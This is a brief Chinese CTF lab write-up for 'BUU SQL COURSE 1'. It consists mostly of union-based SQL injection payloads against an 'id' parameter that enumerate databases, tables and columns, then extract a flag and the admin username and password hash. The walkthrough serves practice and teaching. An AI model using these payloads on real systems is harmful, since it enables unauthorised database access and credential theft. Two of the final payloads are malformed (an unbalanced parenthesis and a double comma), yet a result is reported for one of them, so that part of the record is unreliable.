BUU SQL COURSE 1
进入靶场后可以看见有三个测试新闻,点击之后抓包,发现id参数
尝试构造payload进行sql注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| ### 查数据库名
?id=-1 union select (select group_concat(schema_name) from information_schema.schemata),2#
结果 {"title":"information_schema,performance_schema,ctftraining,mysql,test,news","content":"2"}
### 查表名
1.news数据库
?id=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema='news'),2#
结果:表名 {"title":"admin,contents","content":"2"}
2.ctftraining数据库
?id=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),2#
结果:表名 {"title":"FLAG_TABLE,news,users","content":"2"}
### 查列名
1.news数据库下的admin表
?id=-1 union select (select group_concat(column_name) from information_schema.columns where table_name='admin'),2#
结果:列名{"title":"id,username,password","content":"2"}
2.ctftraining数据库下的FLAG_TABLE表
?id=-1 union select (select group_concat(column_name) from information_schema.columns where table_name='FLAG_TABLE'),2#
结果:列名{"title":"FLAG_COLUMN","content":"2"}
### 查内容
?id=-1 union select FLAG_COLUMN from ctftraining.FLAG_TABLE),2#
?id=-1 union select (select group_concat(username,,password) from admin),2#
结果:列中内容{"title":"admin 847d963fd3605f791179be6fbc4b457a","content":"2"}
|
最终得到用户名:admin,密码847d963fd3605f791179be6fbc4b457a